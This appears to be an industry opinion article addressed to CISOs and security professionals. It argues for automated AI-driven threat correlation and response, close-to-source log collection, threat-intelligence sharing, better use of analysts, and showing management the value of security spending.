Depending on how you look at it, the past year was either tough for security professionals or it showed the world how complex and interesting this field really is. After all, we're not working to identify some deterministic software bug — we're combatting real adversaries who are constantly testing our defenses.
Like many of you, I spend a lot of time talking to customers, partners, and other security professionals, and there is clearly a lot we can do to become more effective for our organizations. Here is my take on what the security community should resolve to accomplish or overcome as we move forward.
1. Embrace the machine.
We have access to programmable technology today that is compatible with other systems, and capable of massive correlations using data from many sources — logins, proximity card data, Web behaviors, locations. We have agents on users' machines that log information about process execution. And we have rich, intelligent sources of threat information from third-party vendors and other experts.
The ability to almost instantaneously correlate all that information means that today's expert systems are doing things humans used to do but doing it much faster. Machines can calculate those correlations in near-real time, build information about what happened, and prioritize events for an analyst to review.
Taking it a step further, today we see machines good enough at making correlations that they instantly know the identified activity is malicious. The challenge is to let go and allow the machine itself to loop back into firewalls, endpoint security, and applications, and actively mitigate the threat.
Embracing AI in this way can reduce response times from months to milliseconds, produce logs that are more relevant, and create APIs that respond to inputs from the bigger systems.
2. Consume farm-to-table security data.
CISOs need to understand the difference between primary data and secondary data, and get as close to the source as possible when automating systems. The closer our data points are to the user, the less risk we run of bad modeling.
The key is to capture logs at the time of creation so, unless the event logging system itself is compromised, you’re going to get unfiltered truth. If you go back to a machine after a bad guy has cleaned up his toolset and deleted the log, the tracks may be covered.
To this end, you have to constantly evaluate log sources to see how quickly the data is logged, what the source is, whether there is redundancy — and identify the correlation points that enable a true picture of what’s happening with each machine on the network.
3. Give back to the community.
On both a human and machine level, getting better at security is an iterative process. When an intrusion analyst identifies something, engineering should imbue that knowledge into the correlation engine. Eventually, this process will allow you to automate what the analyst does in a virtual movement between the machine, engineering and the network’s defenses — making every piece more effective.
Now it's time to share what you’ve learned. Ideally, that information should go to a major threat intel vendor to be correlated with other data so the broader security community can benefit as well.
4. Let analysts analyze.
Information security pros and analysts are expensive, and if there's a host of things that machines can suppress, this frees those human resources to add value elsewhere and reward the C-suite for the investments they've made in security.
And believe it or not, this is also a retention mechanism. Why? Because now only the really hard problems are turned over to analysts, which makes them happy. This is ultimately why many of us go into the security industry in the first place. We're dealing with human adversaries who are actively and continually adjusting their software and tactics to get into your network. It's a battle of wits and knowledge. That part of the job is much more compelling than poring over extensive activity logs.
5. Prove your value — and the value of future investments.
CISOs are great at a lot of things, but demonstrating our value isn't always one of them. For many years, security was neglected. Only in the last decade has it come into its own, and only in the last couple of years has it really entered the broader public consciousness. Now we need to take another step toward connecting the dots between risk and value.
When we hear that competitors, customers, or peers have experienced breaches, we should alert management. If a company similar to yours lost customer data or intellectual property, or was hacked because of software you have in common, brief management on that too. Build a case study or a presentation to demonstrate how your architecture can (or did) prevent a similar attack.
Ditto when things happen in your own network. When your defenses detect a ransomware attack, it demonstrates the value of management-approved investments. The endpoint security software you bought detected the attack within 100 milliseconds. Your AI correlation engines booted the fix back into the email filtering system. The backup system just paid for itself because you were able to recover the lost work and the copy was only three hours old. The system worked. You won.
And if you didn't win, what mitigations could have prevented the loss? Management should know that too, so they have a clear understanding of where to invest next.
Commit to Making It Happen
So what’s the point of all this? First, you need time to close the gap. Going 200 days until detection of an intrusion isn't acceptable when it’s possible to detect many threats in 150 milliseconds and fan out a protection to every machine in the enterprise in another 150 milliseconds.
And second, organizations can only achieve that level of effectiveness when the CISO and upper management commit to embracing automation. Yes, it takes engineering, technical knowledge, and the right gear. But in the end, it's the commitment by the organization that makes it all work.